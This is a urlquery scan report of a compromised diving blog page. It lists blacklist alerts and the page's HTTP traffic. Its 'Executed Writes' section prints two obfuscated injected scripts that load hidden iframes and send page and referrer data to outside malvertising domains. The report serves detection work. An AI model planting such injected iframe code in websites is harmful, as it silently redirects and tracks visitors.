Overview

URL www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/
IP64.34.173.227
ASNAS13768 Peer 1 Network (USA) Inc.
Location United States
Report completed2019-02-09 19:22:07 CET
StatusLoading report..
urlquery Alerts Suspicious javascript obfuscation


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2019-02-09 2 www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/ Malware
2019-02-09 2 www12.teaserguide.com/? Malware
2019-02-09 2 www12.teaserguide.com/? Malware
2019-02-09 2 www12.teaserguide.com/? Malware
2019-02-09 2 www12.teaserguide.com/? Malware
2019-02-09 2 www12.teaserguide.com/? Malware
2019-02-09 2 www12.teaserguide.com/? Malware
2019-02-09 2 www.sjue.com/blog/2008/10/wreck-discovery-on-the-indepencence-ii/ Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 64.34.173.227

Date UQ / IDS / BL URL IP
2019-06-09 17:49:19 +0200
4 - 4 - 2 www.sjue.com/blog/2010/07/playing-with-the-ca (...) 64.34.173.227
2019-06-09 16:26:46 +0200
4 - 2 - 3 sjue.com/blog/2008/05/stolt-dagali-independen (...) 64.34.173.227
2019-06-09 16:26:13 +0200
4 - 4 - 2 www.sjue.com/blog/2008/05/stolt-dagali-indepe (...) 64.34.173.227
2019-06-09 14:48:22 +0200
4 - 3 - 3 sjue.com/blog/2004/09/oil-wreck-spring-tide-s (...) 64.34.173.227
2019-06-09 14:47:17 +0200
4 - 3 - 2 www.sjue.com/blog/2004/09/oil-wreck-spring-ti (...) 64.34.173.227
2019-06-09 13:52:28 +0200
4 - 1 - 3 sjue.com/blog/2008/11/northeast-galeries 64.34.173.227
2019-06-09 06:48:42 +0200
4 - 3 - 3 sjue.com/blog/2009/12/yosemite 64.34.173.227
2019-05-31 01:45:58 +0200
4 - 3 - 2 sjue.com/blog/2007/11 64.34.173.227
2019-05-30 20:40:33 +0200
4 - 4 - 2 sjue.com/blog/2008/07 64.34.173.227
2019-05-30 20:40:31 +0200
4 - 1 - 3 sjue.com/blog/2009/05/new-numbers-and-the-pin (...) 64.34.173.227

Last 10 reports on ASN: AS13768 Peer 1 Network (USA) Inc.

Date UQ / IDS / BL URL IP
2019-06-20 07:35:06 +0200
0 - 0 - 0 infiserv.club 69.90.160.10
2019-06-19 22:28:18 +0200
0 - 0 - 0 thebaycentre.ca 65.39.154.33
2019-06-19 22:24:37 +0200
0 - 0 - 0 thebaycentre.ca 65.39.154.33
2019-06-19 18:38:51 +0200
0 - 0 - 0 https://admin.alivesupport.co/chatserver/live (...) 69.90.31.52
2019-06-19 13:01:51 +0200
0 - 0 - 0 www.aimediaserver6.com 64.34.196.222
2019-06-18 21:10:42 +0200
0 - 0 - 0 https://clients.floridasbdc.org/workshop.aspx (...) 207.198.101.166
2019-06-18 13:46:58 +0200
0 - 0 - 0 n1wireless.com 76.74.147.76
2019-06-14 18:43:08 +0200
0 - 0 - 0 www.coffeecup.com/ 66.223.62.4
2019-06-14 16:36:34 +0200
0 - 0 - 0 discover.dailytechnologyinformation.net/ 69.28.251.165
2019-06-13 20:51:40 +0200
2 - 0 - 0 www.voicevibes.net/1.php 72.51.34.23

No other reports on domain: sjue.com



JavaScript

Executed Scripts (9)


Executed Evals (0)


Executed Writes (2)

#1 JavaScript::Write (size: 582, repeated: 6) - SHA256: 8fbb8d3065fda178e73d9e6404983d8e35dea181bc53bc6a5cf39d52cb3693c1

                                        < script type = "text/javascript" >
    var referer = encodeURIComponent(document.referrer);
var default_keyword = encodeURIComponent(document.title);
var host = encodeURIComponent(location.host);
var iframe = document.createElement('iframe');
iframe.width = 0;
iframe.height = 0;
iframe.src = "h" + "tt" + "p://" + "c11n4." + "i.te" + "as" + "erg" + "uid" + "e.c" + "om" + "/snitch?d" + "ef" + "aul" + "t_k" + "ey" + "word=" + default_keyword + "&refe" + "rrer=" + referer + "&se_r" + "ef" + "er" + "rer=" + referer + "&sou" + "rce=" + host;
document.body.appendChild(iframe); < /script>
                                    

#2 JavaScript::Write (size: 583, repeated: 1) - SHA256: 1bf897f594bc67301f838c5e3d41d83d1a21d843baa5d30a95bd48c1072c567b

                                        < script type = "text/javascript" >
    var referer = encodeURIComponent(document.referrer);
var default_keyword = encodeURIComponent(document.title);
var host = encodeURIComponent(location.host);
var iframe = document.createElement('iframe');
iframe.width = 0;
iframe.height = 0;
iframe.src = "h" + "tt" + "p://" + "kfc." + "i.i" + "ll" + "uminat" + "ione" + "s.c" + "om" + "/snitch?d" + "ef" + "aul" + "t_k" + "ey" + "word=" + default_keyword + "&refe" + "rrer=" + referer + "&se_r" + "ef" + "er" + "rer=" + referer + "&sou" + "rce=" + host;
document.body.appendChild(iframe); < /script>
                                    


HTTP Transactions (31)


Request Response
                                        
                                            GET /blog/2008/10/wow-what-a-dive/comment-page-1/ HTTP/1.1 
Host: www.sjue.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         64.34.173.227
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Sat, 09 Feb 2019 14:39:29 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze19
X-Pingback: http://www.sjue.com/blog/xmlrpc.php
Link: <http://www.sjue.com/blog/?p=60>; rel=shortlink
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5585
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   5585
Md5:    7a1eb1f11cb633ff068ca84b870c91fc
Sha1:   59abed0d2d4fc38103c5905bc83efb000f5566ab
Sha256: 3e9b4eff14ae78d030121e0cbace7a57924a1acd87bf7a721780877b76b2aeaf

Alerts:
  urlquery:
    - Suspicious javascript obfuscation
    - Suspicious javascript obfuscation
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /blog/wp-includes/js/comment-reply.min.js?ver=3.5 HTTP/1.1 
Host: www.sjue.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         64.34.173.227
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Sat, 09 Feb 2019 14:39:30 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 23 Aug 2012 00:04:18 GMT
Etag: "140e30-312-4c7e399c26480"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 412
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   412
Md5:    87818ceb3510914586339269c23ece39
Sha1:   b8a843b89bc5f4b45b47b1f04a2cdcd5d8ced9d6
Sha256: 4e8eaf3cbd3c394a0200c47660f6d2f8bebee1fdd025024e5ef2590203d7c9ba
                                        
                                            GET /blog/wp-content/themes/inferno-mf/style.css HTTP/1.1 
Host: www.sjue.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         64.34.173.227
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Sat, 09 Feb 2019 14:39:30 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Wed, 23 Jan 2013 15:16:34 GMT
Etag: "140620-29f1-4d3f62e074995"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3139
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   3139
Md5:    fc31ba34d80757f570479c3df10f5644
Sha1:   eaa664c321c3896b25f50e919b3ce99c44b077e6
Sha256: d00d3cc3b651a9d622062fb9031a7de0476e2d3cc200e55c624b668ca8de2654
                                        
                                            GET /analytics.js HTTP/1.1 
Host: www.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/
If-Modified-Since: Fri, 03 Oct 2014 00:48:42 GMT

                                         
                                         216.58.211.142
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Strict-Transport-Security: max-age=10886400; includeSubDomains; preload
Timing-Allow-Origin: *
Date: Sat, 09 Feb 2019 18:15:34 GMT
Expires: Sat, 09 Feb 2019 20:15:34 GMT
Last-Modified: Wed, 16 Jan 2019 20:01:45 GMT
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 17543
Cache-Control: public, max-age=7200
Age: 362


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   17543
Md5:    a6ce90b9145f18e7a721eb3819daaaab
Sha1:   1c422016bd20a08535d2cc37448c498cf4a0f829
Sha256: 94fe45c14a2ce4fd5f1401c835e5d63111ebf89ff58e03d6b780592f02abf778
                                        
                                            GET /snitch?default_keyword=WOW!%20What%20a%20Dive!%20%C2%AB%20Go%20deep%2C%20stay%20long&referrer=&se_referrer=&source=www.sjue.com HTTP/1.1 
Host: c11n4.i.teaserguide.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         104.200.23.46
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
                                        
Server: openresty/1.13.6.1
Date: Sat, 09 Feb 2019 18:21:37 GMT
Content-Length: 0
Connection: close
Location: http://www12.teaserguide.com/?
X-Mtm-Path: 0
Vary: Accept-Language
Content-Language: en
Set-Cookie: mtm_delivered=WyJ0ZWFzZXJndWlkZS5jb20iLCJodHRwOi8vd3d3MTIudGVhc2VyZ3VpZGUuY29tLz8iLDIsIjIwMTktMDItMDkgMTg6MjE6MzciLG51bGwsODYsbnVsbCxudWxsXQ:1gsXFx:vY3iP_rYO9cBSGCH7VKyBF24jvo; expires=Sat, 09-Feb-2019 19:21:37 GMT; Max-Age=3600; Path=/


--- Additional Info ---
                                        
                                            GET /snitch?default_keyword=WOW!%20What%20a%20Dive!%20%C2%AB%20Go%20deep%2C%20stay%20long&referrer=&se_referrer=&source=www.sjue.com HTTP/1.1 
Host: kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         103.224.182.252
HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
                                        
Date: Sat, 09 Feb 2019 18:21:37 GMT
Server: Apache
X-Powered-By: PHP/5.6.39-0+deb8u1
Set-Cookie: __tad=1549736497.2882432; expires=Tue, 06-Feb-2029 18:21:37 GMT; Max-Age=315360000
Location: http://ww31.kfc.i.illuminationes.com/snitch?default_keyword=WOW!%20What%20a%20Dive!%20%C2%AB%20Go%20deep%2C%20stay%20long&referrer=&se_referrer=&source=www.sjue.com
Content-Length: 0
Connection: close


--- Additional Info ---
                                        
                                            GET /r/collect?v=1&_v=j73&a=330187471&t=pageview&_s=1&dl=http%3A%2F%2Fwww.sjue.com%2Fblog%2F2008%2F10%2Fwow-what-a-dive%2Fcomment-page-1%2F&ul=en-us&de=UTF-8&dt=WOW!%20What%20a%20Dive!%20%C2%AB%20Go%20deep%2C%20stay%20long&sd=24-bit&sr=1176x885&vp=1159x754&je=1&fl=10.0%20r45&_u=IEBAAEQ~&jid=555879797&gjid=1405938937&cid=799426551.1549736498&tid=UA-6219318-1&_gid=1244124815.1549736498&_r=1&z=1599577355 HTTP/1.1 
Host: www.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         216.58.211.142
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Access-Control-Allow-Origin: *
Date: Sat, 09 Feb 2019 18:21:37 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Server: Golfe2
Content-Length: 35


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   35
Md5:    28d6814f309ea289f847c69cf91194c6
Sha1:   0f4e929dd5bb2564f7ab9c76338e04e292a42ace
Sha256: 8337212354871836e6763a41e615916c89bac5b3f1f0adf60ba43c7c806e1015
                                        
                                            GET /snitch?default_keyword=WOW!%20What%20a%20Dive!%20%C2%AB%20Go%20deep%2C%20stay%20long&referrer=&se_referrer=&source=www.sjue.com HTTP/1.1 
Host: c11n4.i.teaserguide.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         104.200.23.46
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
                                        
Server: openresty/1.13.6.1
Date: Sat, 09 Feb 2019 18:21:38 GMT
Content-Length: 0
Connection: close
Location: http://www12.teaserguide.com/?
Vary: Accept-Language
Content-Language: en
Set-Cookie: mtm_delivered=WyJ0ZWFzZXJndWlkZS5jb20iLCJodHRwOi8vd3d3MTIudGVhc2VyZ3VpZGUuY29tLz8iLDIsIjIwMTktMDItMDkgMTg6MjE6MzgiLG51bGwsODYsbnVsbCxudWxsXQ:1gsXFy:njRlGWUA4j_Cv2jqbqVCRZPkpvk; expires=Sat, 09-Feb-2019 19:21:38 GMT; Max-Age=3600; Path=/


--- Additional Info ---
                                        
                                            GET /? HTTP/1.1 
Host: www12.teaserguide.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         185.53.179.29
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Sat, 09 Feb 2019 18:21:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_oneclick
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   475
Md5:    0b396efa63b7f4f3b51f37655492cb85
Sha1:   d0e7ddd7c2b3d28d9772d5e5af8bd130939eb453
Sha256: 36c315cb9db4d9abeb7086959a29dd97cb58252165be412add6dc7efbccd6412

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /themes/assets/style.css HTTP/1.1 
Host: d1lxhc4jvstzrp.cloudfront.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www12.teaserguide.com/?

                                         
                                         143.204.51.134
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Last-Modified: Mon, 07 Jan 2019 10:07:22 GMT
Content-Encoding: gzip
Date: Sat, 09 Feb 2019 16:29:56 GMT
Etag: W/"5c3324da-33d"
Vary: Accept-Encoding
Age: 6715
X-Cache: Hit from cloudfront
Via: 1.1 475d4ecb64796af058573c6f1048e898.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 20rtTuiUaGUrXTamykLSskM0G5DxbmxRkyJhAR4igABkuqznZLF_lw==


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   343
Md5:    c689d30608f974031e2c24c299c8dc4b
Sha1:   b483802c89db0131b6d7768a68c43e5ae411d601
Sha256: 78c58f7b6fb701d9644af4456df21dca0e90d09e88952227d6d178e8d4e5a386
                                        
                                            GET /snitch?default_keyword=WOW!%20What%20a%20Dive!%20%C2%AB%20Go%20deep%2C%20stay%20long&referrer=&se_referrer=&source=www.sjue.com HTTP/1.1 
Host: c11n4.i.teaserguide.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         104.200.23.46
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
                                        
Server: openresty/1.13.6.1
Date: Sat, 09 Feb 2019 18:21:38 GMT
Content-Length: 0
Connection: close
Location: http://www12.teaserguide.com/?
Vary: Accept-Language
Content-Language: en
Set-Cookie: mtm_delivered=WyJ0ZWFzZXJndWlkZS5jb20iLCJodHRwOi8vd3d3MTIudGVhc2VyZ3VpZGUuY29tLz8iLDIsIjIwMTktMDItMDkgMTg6MjE6MzgiLG51bGwsODYsbnVsbCxudWxsXQ:1gsXFy:njRlGWUA4j_Cv2jqbqVCRZPkpvk; expires=Sat, 09-Feb-2019 19:21:38 GMT; Max-Age=3600; Path=/


--- Additional Info ---
                                        
                                            GET /? HTTP/1.1 
Host: www12.teaserguide.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         185.53.179.29
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Sat, 09 Feb 2019 18:21:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_oneclick
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   475
Md5:    0b396efa63b7f4f3b51f37655492cb85
Sha1:   d0e7ddd7c2b3d28d9772d5e5af8bd130939eb453
Sha256: 36c315cb9db4d9abeb7086959a29dd97cb58252165be412add6dc7efbccd6412

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /blog/wp-content/themes/inferno-mf/images/bg-inferno-mf.jpg HTTP/1.1 
Host: www.sjue.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/wp-content/themes/inferno-mf/style.css

                                         
                                         64.34.173.227
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Sat, 09 Feb 2019 14:39:30 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Wed, 06 Mar 2013 21:09:05 GMT
Etag: "14061d-490e9-4d7480013c6d7"
Accept-Ranges: bytes
Content-Length: 299241
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   299241
Md5:    27face42da68d45b68d77f963006dcbd
Sha1:   bd3bf265ab00a48535032bcd539c94c29fc992d7
Sha256: 351dc79d9d6a41589cbc2f877e5038367d513963bf504c0917cdfc4ce07ea3e8
                                        
                                            GET /themes/assets/skenzo.css HTTP/1.1 
Host: d1lxhc4jvstzrp.cloudfront.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www12.teaserguide.com/?

                                         
                                         143.204.51.134
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 09 Feb 2019 11:20:00 GMT
Last-Modified: Mon, 07 Jan 2019 10:07:22 GMT
Etag: W/"5c3324da-159"
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 25298
X-Cache: Hit from cloudfront
Via: 1.1 2291c3a6bbdb0b0147dc7972fd25ec3e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: LidNQPdydG59X7oLSKyHZfhU8_UEexNiFBC2TfmoQfnqP-TcOMCZiQ==


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   208
Md5:    c2fb482175c53a41861e41226fa2f029
Sha1:   602df898a184b1c5a26897fda150ad95a631423d
Sha256: d5667164154a9ee109c677a9a9d072c45bdf2787440f2174f4a6d484c98c644e
                                        
                                            GET /? HTTP/1.1 
Host: www12.teaserguide.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         185.53.179.29
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Sat, 09 Feb 2019 18:21:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_oneclick
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   475
Md5:    0b396efa63b7f4f3b51f37655492cb85
Sha1:   d0e7ddd7c2b3d28d9772d5e5af8bd130939eb453
Sha256: 36c315cb9db4d9abeb7086959a29dd97cb58252165be412add6dc7efbccd6412

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /?dn=teaserguide.com&pid=9PO755G95 HTTP/1.1 
Host: iyfsearch.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www12.teaserguide.com/?

                                         
                                         208.91.196.46
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Sat, 09 Feb 2019 18:21:38 GMT
Server: Apache
ntCoent-Length: 271
Keep-Alive: timeout=5, max=126
Connection: Keep-Alive
Cache-Control: private
Content-Encoding: gzip
Content-Length: 195


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   195
Md5:    1602f554c49123883d394899c75fec41
Sha1:   4ca585122027c04fc280f6e5a53400505426429a
Sha256: 89f8bba454536bf68956567534ee6894b8f1118f3b2300d059167319ac7dc499
                                        
                                            GET /snitch?default_keyword=WOW!%20What%20a%20Dive!%20%C2%AB%20Go%20deep%2C%20stay%20long&referrer=&se_referrer=&source=www.sjue.com HTTP/1.1 
Host: c11n4.i.teaserguide.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         104.200.23.46
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
                                        
Server: openresty/1.13.6.1
Date: Sat, 09 Feb 2019 18:21:38 GMT
Content-Length: 0
Connection: close
Location: http://www12.teaserguide.com/?
Vary: Accept-Language
Content-Language: en
Set-Cookie: mtm_delivered=WyJ0ZWFzZXJndWlkZS5jb20iLCJodHRwOi8vd3d3MTIudGVhc2VyZ3VpZGUuY29tLz8iLDIsIjIwMTktMDItMDkgMTg6MjE6MzgiLG51bGwsODYsbnVsbCxudWxsXQ:1gsXFy:njRlGWUA4j_Cv2jqbqVCRZPkpvk; expires=Sat, 09-Feb-2019 19:21:38 GMT; Max-Age=3600; Path=/


--- Additional Info ---
                                        
                                            GET /?dn=teaserguide.com&pid=9PO755G95 HTTP/1.1 
Host: iyfsearch.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www12.teaserguide.com/?

                                         
                                         208.91.196.46
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Sat, 09 Feb 2019 18:21:38 GMT
Server: Apache
ntCoent-Length: 272
Keep-Alive: timeout=5, max=102
Connection: Keep-Alive
Cache-Control: private
Content-Encoding: gzip
Content-Length: 195


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   195
Md5:    c6462ed23c8cc368bd681226f89ea628
Sha1:   9bcadae0cb0ed0ff9661a5e409dd5120e2b68900
Sha256: 839370a7060ce2aca81cb5add1709bb5c9ce2b3fd8045c7a795d336a02a63499
                                        
                                            GET /? HTTP/1.1 
Host: www12.teaserguide.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
